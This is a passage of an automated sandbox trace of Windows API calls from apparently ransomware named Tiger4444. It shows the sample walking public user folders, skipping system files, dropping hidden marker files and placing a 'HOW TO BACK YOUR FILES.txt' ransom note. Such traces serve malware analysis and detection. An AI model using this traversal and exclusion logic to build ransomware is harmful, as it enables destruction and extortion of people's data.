(lpString="Tiger4444") returned 9 [0044.751] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.751] lstrlenW (lpString=".dll") returned 4 [0044.751] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.751] lstrlenW (lpString=".lnk") returned 4 [0044.751] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.751] lstrlenW (lpString=".ini") returned 4 [0044.751] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.751] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="Tiger4444.exe") returned -1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0044.751] lstrcmpiW (lpString1="Documents", lpString2="NTUSER.DAT") returned -1 [0044.751] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0044.751] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents", dwFileAttributes=0x10) returned 1 [0044.751] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0044.752] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x34) returned 0xc72ec8 [0044.752] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0044.752] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="Tiger4444.exe") returned -1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0044.752] lstrcmpiW (lpString1="Downloads", lpString2="NTUSER.DAT") returned -1 [0044.752] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0044.752] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads", dwFileAttributes=0x10) returned 1 [0044.752] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0044.752] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x34) returned 0xc72d48 [0044.752] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc664e8 [0044.752] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb207547d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="Tiger4444.exe") returned -1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2=".") returned 1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="..") returned 1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="windows") returned -1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="bootmgr") returned 1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="pagefile.sys") returned -1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="boot") returned 1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="ids.txt") returned 1 [0044.752] lstrcmpiW (lpString1="Libraries", lpString2="NTUSER.DAT") returned -1 [0044.752] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Libraries" | out: lpString1="Libraries") returned="Libraries" [0044.752] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries", dwFileAttributes=0x12) returned 1 [0044.753] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0044.753] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x34) returned 0xc72f08 [0044.753] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc665c8 [0044.753] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.753] lstrcmpiW (lpString1="Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="Tiger4444.exe") returned -1 [0044.753] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0044.753] lstrcmpiW (lpString1="Music", lpString2="NTUSER.DAT") returned -1 [0044.753] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Music" | out: lpString1="Music") returned="Music" [0044.753] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music", dwFileAttributes=0x10) returned 1 [0044.753] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66540 [0044.753] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2c) returned 0xc67598 [0044.753] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66548 | out: ListHead=0xc66828, ListEntry=0xc66548) returned 0xc66528 [0044.753] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2="Tiger4444.exe") returned -1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0044.753] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0044.754] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0044.754] lstrcmpiW (lpString1="Pictures", lpString2="NTUSER.DAT") returned 1 [0044.754] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0044.754] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures", dwFileAttributes=0x10) returned 1 [0044.754] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0044.754] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc72e88 [0044.754] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc66548 [0044.754] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="Tiger4444.exe") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0044.754] lstrcmpiW (lpString1="Videos", lpString2="NTUSER.DAT") returned 1 [0044.754] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0044.754] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos", dwFileAttributes=0x10) returned 1 [0044.754] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0044.754] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2e) returned 0xc67b80 [0044.754] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc66308 [0044.754] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0044.754] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0044.754] lstrcpyW (in: lpString1=0x30aeac8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.755] CreateFileW (lpFileName="C:\\Users\\Public\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.755] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.755] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.755] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.755] CloseHandle (hObject=0x260) returned 1 [0044.755] CloseHandle (hObject=0x2ac) returned 1 [0044.756] GetCurrentThreadId () returned 0xfa8 [0044.756] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0044.756] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public\\Videos", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0044.756] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc67b80 | out: hHeap=0xc50000) returned 1 [0044.756] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0044.756] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0044.756] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0044.756] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Videos\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Videos\\.BFC0E91B00AE8A0620D3" [0044.756] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\videos\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.757] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.807] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.808] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.809] CloseHandle (hObject=0x2ac) returned 1 [0044.810] lstrlenW (lpString="C:\\Users\\Public\\Videos") returned 22 [0044.810] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.810] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7fb198cf, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0044.810] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.810] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.810] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.810] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.810] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7fb198cf, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.810] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.810] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.810] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.810] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.810] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.810] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fb198cf, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fb198cf, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fb8c07c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.811] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.811] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.811] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.811] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.811] lstrcpyW (in: lpString1=0x30aead6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.811] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.811] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.812] lstrlenW (lpString="desktop.ini") returned 11 [0044.812] lstrlenW (lpString="Tiger4444") returned 9 [0044.812] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.812] lstrlenW (lpString=".dll") returned 4 [0044.812] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.812] lstrlenW (lpString=".lnk") returned 4 [0044.812] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.812] lstrlenW (lpString=".ini") returned 4 [0044.812] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.812] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0044.812] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0044.812] lstrcpyW (in: lpString1=0x30aead6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.812] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\videos\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.812] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.813] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.813] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.813] CloseHandle (hObject=0x260) returned 1 [0044.813] CloseHandle (hObject=0x2ac) returned 1 [0044.814] GetCurrentThreadId () returned 0xfa8 [0044.814] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0044.814] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public\\Pictures", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0044.814] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72e88 | out: hHeap=0xc50000) returned 1 [0044.814] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0044.814] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0044.814] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0044.814] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Pictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Pictures\\.BFC0E91B00AE8A0620D3" [0044.814] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\pictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.815] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.817] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.818] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.819] CloseHandle (hObject=0x2ac) returned 1 [0044.819] lstrlenW (lpString="C:\\Users\\Public\\Pictures") returned 24 [0044.819] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.819] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7fbb21f8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d88 [0044.819] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.819] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.819] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.820] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.820] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7fbb21f8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.820] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.820] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.820] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.820] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.820] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.820] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, 